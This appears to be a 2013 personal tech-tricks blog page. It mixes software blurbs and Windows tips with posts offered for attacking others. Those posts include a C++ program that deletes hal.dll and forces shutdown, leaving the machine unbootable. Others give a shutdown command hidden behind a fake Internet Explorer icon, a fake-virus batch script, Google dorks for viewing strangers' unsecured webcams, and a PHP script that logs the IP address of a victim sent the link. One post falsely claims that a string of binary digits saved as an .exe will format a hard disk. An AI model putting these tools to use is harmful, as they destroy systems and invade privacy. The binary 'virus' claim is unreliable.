Wednesday, 30 January 2013

Nokia PC Suite to Controll Nokia mobile Through Computer



Description 

Nokia PC Suite allows you to connect your phone with Windows to synchronize data, to backup files, to download apps, games and entertainment and to install software, to update software, to transfer images and music between a Nokia phone and your computer. 




Key features 

- Use: In fact, it comes along with several useful features to enhance your mobile experience. Once you plug your phone to the computer, these features can be accessed from the main menu with a series of bright and bold icons for ease of use. 

- Connectivity options: There are 4connectivity options: Bluetooth, infrared, serial cable (CA-42) and USB cable. The last one is the fastest. In case of some connection problems or unavailability of file transfer or other functions, you’d better unplug the device and try a new connection a few moments later. 

- Messaging functions: It includes handy messaging functions. You write your SMS on your computer and then send it to one of your contacts in your address book. 

- Videos: The other useful function of Nokia PC Suite is that it can be used to view and to convert videos. It is then possible to convert any film into the format compatible with your Nokia phone. 

System requirements 

Hardware: 
- Space disk: 300MB free space 
- USB cable, infrared (IrDA), Bluethooth. 

Software: 
- Windows 7 (32-bit or 64-bit) 
- Windows 7 (32-bit or 64-bit edition) 
- Windows Vista (32-bit or 64-bit edition) 
- Windows XP Professional x64 Edition (Service Pack 2) 
- Windows XP (Professional or Home Edition) Service Pack 2 or later 

Pros 
- Intuitive interface. 
- Fast synchronization. 
- Several tools for phone enhancement. 

Cons 
- Not compatible with all Nokia devices. 
- Some bugs when trying to pair the phone and the computer.

1 comments:

Learn HTML & CSS


Hello Dear:
Now HTML is not far from your access you can learn it easily and can design your own website its is not a tough language i think this is easiest language of Computer programming.
Click Here you Get 

 Download HTML & CSS Basic Learning 

Note:
To perform Your HTML And CSS Tasks And For More understanding Please Visit This link also:
For Visit Click Here

0 comments:

Free Screen Video Recorder 2.5.28.128 + Portable


Free Screen Video Recorder 2.5.28.128 + Portable

Free Screen Video Recorder 2.5.28.128 + Portable | 18.52/25.49 Mb


Free Screen Video Recorder is an easy-to-use, fast, and powerful video-recording software. You can use this screen capture software to record full screen or any area of the desktop screen, and you can record audio and mouse cursor's movement. Free Screen Video Recorder can be used to record webcams from AIM, MSN, ICQ, Yahoo Messenger or capture movies from TV card and theater online, or record DVD, VCD, RM, MPEG, or make slide-show training documents.

Key features:
· Record activities of full screen or part of screen into AVI or WMV file
· Fast speed and Very Easy to use
· Support recording audio
· Support recording mouse cursor
· Support 5 capture types: random region, window, full screen, fixed size, fixed region
· Support auto save recordings
· Support blinking when recording
· Support customed hotkey to start or stop recording quickly
· Video/Audio codec choosable, you can select any available video/audio codec from your computer
· Support hide on recording, window can be minimized to icon in system tray

dvdvideosoft.com 

0 comments:

How To Play Youtube Videos In The Website


PLAY YOUTUBE VIDEOS IN THE WEBSITE>>
src="http://www.youtube.com/urlink"
type="application/x-shockwave-flash">


eg:

 <html>
<body>

<embed
width="420" height="345"
src="http://www.youtube.com/urlink"
type="application/x-shockwave-flash">
</embed>

</body>
</html>

0 comments:

TO DELETE THE HAL.DLL FILE


4] TO DELETE THE HAL.DLL FILE

This is a powerful C++ program, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.This is not a prank..

Warning: Do not try this on your home computer.

Code:

#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
    system("del %SystemRoot%\\system32\\hal.dll -q"); //PWNAGE TIME
    system("%SystemRoot%\\system32\\shutdown.exe -s -f -t 00");
    system("PAUSE");
    return EXIT_SUCCESS;
}

Note:
          The "del" command is used in DOS to delete stuff. "-q" is a parameter which means force delete,or delete without asking.shutdown -s -f -t 00 means shutdown,force close everything running,in 00 seconds time.

0 comments:

Facebook Requests Accept Or Reject at One Time


1] FACEBOOK ACCEPT OR REJECT AT ONE TIME
        If You Get A Lot Of Friend Requests Daily Or You Opened You Facebook Account After A Long Time, You Could End Up Having To Manually Accept Or Reject All Of Them, these code can be used to accept or reject all of them at once.
 PROCESS>>>
 Copy The Following Code:

For Accepting:

javascript:for( i = 1;i<document.getElementsByName("actions[accept]").length;i++){document.getElementsByName("actions[accept]")[i].click();}void(0);

For Rejecting:

javascript:for( i = 1;i<document.getElementsByName("actions[hide]").length;i++){document.getElementsByName("actions[hide]")[i].click();}void(0);

    Paste This Code In The Address Bar Of The Page You Opened In The First Step

    Now Just Wait And Let The Script Work!!


Note: For Chrome Users: When You Paste The Code In The Address Bar, You Will Manually Need To Reinsert "javascript:" in Front Of It

0 comments:

Saturday, 26 January 2013

How to make a prank shutdown virus


How to make a prank shutdown virus

Ever wonder what new prank you could come up with to make your little sister go crazy? Here's a simple, yet very effective one. Just switch one of your desktop icons (i.e. Internet Explorer) with a fake one and a warning box will pop-up which will shut down your computer within 30 seconds. Isn't that enough to make lil' sister yell when she sees her Barbie doll game go bye-bye? Here's how it works:

This isn't really a virus ... its simply a shutdown program which will make your friends freak out.

First, you will need to create a shortcut. You can create a shortcut by right-clicking on your desktop and selecting New, and then, Shortcut.

A Create Shortcut box should then open. In that box, write the following:

shutdown -s -t 30 -c "VIRUS DETECTED!!"

(note: the number 30 can be replaced by any other number. That number corresponds to the number of seconds before the computer will shutdown. Here I have chosen 30 in order to have enough time to close it before my computer shuts down. Also, the message between quotes can be replaced by something like "YOU HAVE BEEN INFECTED BY A TROJAN VIRUS" or some other great idea. However, the message must be between quotes.)

After, simply click on Next and a box with the name Shutdown will appear. Change the name that you want for it. In this case I have chosen Internet Explorer but it can always be renamed how you prefer.

After naming it, click on Finish and ... here's your shutdown virus!!!! Not very convincing he? Well, in that case let's change our icon!

Right-click on your shutdown Internet Explorer icon (or whichever name you gave it) and select Properties.

Select Change Icon

(Note: A box saying "system 32 does not have any icons choose from a diffrent list" or something like that may pop-up; if it does simply click on Ok)

Now... it depends on what you have named your shutdown virus ... If you chose Internet Explorer scroll all the way to the right and you will find the icon. If you did not choose Internet Explorer feel free to choose a different icon... Remember it has to be something that people will click on.

Now Heres our Icon ... Now it looks like something that people will click on.

To close the program, select the start menu and click on Run...

Write: Shutdown -a

and the program should shutdown immediately.

(Note: To shut it, you can also do a new shortcut but instead of writing shutdown -s -t 30 -c "VIRUS DETECTED" write this: shutdown -a

and call it Shutdown abort..So instead of closing it with Run you can just click on your shutdown abort shortcut.)

Have fun freaking out your friends/family ... And dont forget to close it or put a longer time frame so that you will have enough time to close it.

WARNING: This program will really shutdown your computer. It may be fun to do it to little sisters or friends but refrain from using it if someone is actually working on the computer, since they will lose all their information.

Enjoy!

0 comments:

Fake Virus Batch File


1) Fake Virus Batch File

I love it because it looks the most like an actual attack. Copy and paste the following into an open Notepad window, then save the file with any name you choose and an extension of “.bat”

Here’s the code:
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep
echo Wscript.Sleep 5000>C:sleep5000.vbs
echo Wscript.Sleep 3000>C:sleep3000.vbs
echo Wscript.Sleep 4000>C:sleep4000.vbs
echo Wscript.Sleep 2000>C:sleep2000.vbs
cd %systemroot%System32
dir
cls
start /w wscript.exe C:sleep3000.vbs
echo Deleting Critical System Files…
echo del *.*
start /w wscript.exe C:sleep3000.vbs
echo Deletion Successful!
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo:
echo Deleting Root Partition…
start /w wscript.exe C:sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x…
cd C:Documents and SettingsAll UsersStart MenuPrograms
mkdir h4x
start /w wscript.exe C:sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1…
start /w wscript.exe C:sleep3000.vbs
echo cd C:Documents and SettingsAll UsersStart MenuProgramsStartuph4x
echo start hax.exe
start /w wscript.exe C:sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:sleep2000.vbs
echo Disabling Windows Firewall…
start /w wscript.exe C:sleep2000.vbs
echo Killing all processes…
start /w wscript.exe C:sleep2000.vbs
echo Allowing virus to boot from startup…
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:sleep2000.vbs
pause
shutdown -s -t 10 -c “Your computer has committed suicide. Have a nice day.”
Here’s how it will look like once it is launched:
cool fake viruses
Your victim’s PC will display messages as in the above image, and then initiate a shutdown sequence which can be stopped by entering “shutdown ““a” in the Run command box. It looks bad, but is otherwise completely harmless.

0 comments:

Thursday, 24 January 2013

How to Delete a hard disk partition on window 7


Delete a hard disk partition

You must be logged on as an administrator to perform these steps.
When you delete a hard disk partition or volume (the terms partition and volume are often used interchangeably), you create empty space that you can use to create new partitions.
If your hard disk is currently set up as a single partition, then you cannot delete it. You also cannot delete the system partition, boot partition, or any partition that contains the virtual memory paging file, because Windows needs this information to start correctly.

Warning

Warning

  • All data on a partition will be lost when you delete it. Be sure to back up any files that you want to save to a different location before you continue.
  1. Open Computer Management by clicking the Start button Picture of the Start button, clicking Control Panel, clicking System and Maintenance, clicking Administrative Tools, and then double-clicking Computer Management.‌ Administrator permission required If you are prompted for an administrator password or confirmation, type the password or provide confirmation.
  2. In the Navigation pane, under Storage, click Disk Management.
  3. Right-click the volume, such as a partition or logical drive, that you want to delete, and then click Delete Volume.
  4. Click Yes to delete the volume.
The resulting empty space is called unallocated space if you deleted a primary partition, or free space if you deleted a logical drive within an extended partition. You can now use the empty space to create additional volumes.

0 comments:

Happy Birthday too You By uSman khan





...Happy Birthday too You By uSman Khan...

0 comments:

Wednesday, 23 January 2013

Virus to Format Hard Disk !!!



                     Today i will show you how to make a virus to format Hard disk. You can send this file to your friend or enemy to format their Hard disk. But please dont try this on your own computer or else you will end up formatting your own computer.
  • Copy the below codes into Notepad.
01001011000111110010010101010101010000011111100000 
  • Save the file as Format.exe
  • You have created your virus. Enjoy !!! 

0 comments:

See unprotected cam of others using google



       
1. Go to Google and search for "inurl:view/view.shtml" (without quote).
           2. Now open any of the link from the search result and enjoy.
             3. Below is the list of google dork you can use to see more cams.

               GOOGLE DORKS
        • inurl:/view.shtml
        • intitle:”Live View / - AXIS” | inurl:view/view.shtml^
        • inurl:ViewerFrame?Mode=
        • inurl:ViewerFrame?Mode=Refresh
        • inurl:axis-cgi/jpg
        • inurl:axis-cgi/mjpg (motion-JPEG)
        • inurl:view/indexFrame.shtml
        • inurl:view/index.shtml
        • inurl:view/view.shtml
        • intitle:start inurl:cgistart
        • intitle:”live view” intitle:axis
        • liveapplet
        • intitle:snc-z20 inurl:home/
        • intitle:liveapplet
        • intitle:”i-Catcher Console - Web Monitor”
        • intitle:axis intitle:”video server”
        • intitle:liveapplet inurl:LvAppl
        • intitle:”EvoCam” inurl:”webcam.html”
        • intitle:”Live NetSnap Cam-Server feed”
        • intitle:”Live View / - AXIS”
        • intitle:”Live View / - AXIS 206W”
        • intitle:”Live View / - AXIS 210″
        • inurl:indexFrame.shtml Axis
        • intitle:”Live View / - AXIS 206M”
        • inurl:”MultiCameraFrame?Mode=Motion”
        • allintitle:”Network Camera NetworkCamera”
        • intitle:”WJ-NT104 Main Page”
        • intext:”MOBOTIX M1″ intext:”Open Menu”
        • intext:”MOBOTIX M10″ intext:”Open Menu”
        • intext:”MOBOTIX D10″ intext:”Open Menu”
        • intitle:”netcam live image”
        • intitle:snc-cs3 inurl:home/
        • intitle:snc-rz30 inurl:home/
        • intitle:”sony network camera snc-p1″
        • intitle:”sony network camera snc-m1″
        • site:.viewnetcam.com -www.viewnetcam.com
        • intitle:”Toshiba Network Camera” user login

        13 comments:

        What is keylogger ? Hacking Through Key Logger



                1. What is keylogger ?
                 
                   You might have heard about keyloggers but really dont know what they are reading this article will clear your mind. A keylogger also know as keystroke logger is software or hardware device which monitors each and every key typed by you on your keyboard. You can not identify the presence of keylogger on your computer since it runs in background and also it is not listed in task manager or control panel. It can be used by parents to keep eye on their childrens or company owner to spy on their employes.


               2. How it can harm you ?
        • It can be used by your enemy or friend to get sensitive information such as your username and password, Bank credit card details etc.
        • Example: You login in to your Facebook account from a computer in which keylogger is install then your username and password will be captured.
               3. Types of  keyloggers 

                  There are two types of keylogger hardware keylogger and software keylogger. Software keylogger is install in your computer where as a Hardware keylogger is attached to your keyboard. Looking at below images will clear your mind.

                                      HARDWARE KEYLOGGER                                  
         

         SOFTWARE KEYLOGGER
         
                                         
               4. How to Protect yourself from keyloggers ?
        • Never use your online banking from cyber cafe. If you want to use then you can try this method. open notepad and type anything Then copy and paste each word that comes in your username or password.
        • You can even use above method to protect your facebook profile, yahoo or gmail id.
        • When you enter cyber cafe make sure that no hardware device is attached to keyboard wire. Its look something similar to above image.

        0 comments:

        What is RAT (Remote Access Trojan) ? Hacking computer through Virus


        RAT
        RAT stands for Remote Access Trojan or Remote Administration Tool. It is one of the most dangerous virus out their over the internet. Hacker can use RAT to get complete control to your computer. He can do basicly anything with your computer. Using RAT hacker can install keyloggers and other malicious viruses remotely to your computer, infect files on your system and more. In this post i will tell you about what hacker can do with your computer using RAT and tell you about some commonly use RAT by hackers.



         What is RAT ?

        As i have told you in my introduction paragraph RAT is Remote Access trojan. It is a peace of software or program which hacker uses to get complete control of your computer. It can be send to you in form of images, videos or any other files. Their are some RAT that even your antivirus software can not detect.  So always be sure about what you are downloading from the internet and never save or download files that anonymous user send you  over the mail or in chat room.

         What You can do with RAT ?

        Once a RAT is installed on any computer hacker can do almost anything with that computer. Some malicious task that you can do with RAT are listed below:

        • Infecting Files
        • Installing Keyloggers
        • Controlling Computer
        • Remotely start webcam, sounds, movies etc
        • Using your PC to attack Website (DDOS)
        • View Screen

         Harmless RAT or Good RAT

        As you have seen how harmfull RAT are for your computer, but their are some good RAT which some of you might be using daily. You might have heard of TeamViewer, it is a software which you use to control some one's computer with his permission for file transfer, sharing your screen and more.

         Some Commonly Used RAT

        • ProRAT
        • CyberGate RAT
        • DarkComet RAT

        0 comments:

        Enable facebook HTTPS


                
                        This is old trick but still if you are not aware of this then this is for you.Facebook has added new feature to browse it securely but is not set by default. Facebook has changed without any notification.Take a look at your URL (top box on your screen.). If you see "http" or just "www" instead of "https" you DO NOT have a secure session & can be hacked.To secure your facebook account just follow the below Steps.


               1. Go to Account 
               2. Then Account Settings 
               3. Then click on Security
               4. Check box (secure browsing)
               5. Click on Save changes.

        0 comments:

        How to grab someone IP address ?



                            I will you show you how to grab someone Ip address using PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chat or by sending mail to victim. So Lets get started.

        • Copy the below codes into Notepad and save it as Grab.php (.php is must) 
          <?php
          $hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
          $img_number = imagecreate(400,95);
          $backcolor = imagecolorallocate($img_number,10,102,153);
          $textcolor = imagecolorallocate($img_number,255,255,255);

          imagefill($img_number,0,0,$backcolor);
          $number0 = " This is Your IP/Proxy";
          $number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
          $number2 = " Host/Proxy: $hostname";
          $number4 = " _________________________________";

          Imagestring($img_number,10,5,5,$number0,$textcolor);
          Imagestring($img_number,10,5,25,$number1,$textcolor);
          Imagestring($img_number,10,5,45,$number2,$textcolor);
          Imagestring($img_number,10,5,50,$number4,$textcolor);
          Imagestring($img_number,10,8,50,$number4,$textcolor);
          Imagestring($img_number,10,5,10,$number4,$textcolor);
          Imagestring($img_number,10,8,10,$number4,$textcolor);

          header("Content-type: image/png");
          imagepng($img_number);
          $file=fopen("Name-here-to-protect-the-File.txt","a");
          $file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
          fwrite($file, $file2);
          fclose($file);
          ?>
            • Now make Free account on any of  the free web hosting sites Ripway or on My3gb .
            • Now upload Grab.php to your web hosting site.
            • Copy the link of your  uploaded file and send it to victim.
            • As soon as victim will click on your link his ip will be saved in your free web hosting site.
            • Enjoy you are Done !!

            0 comments: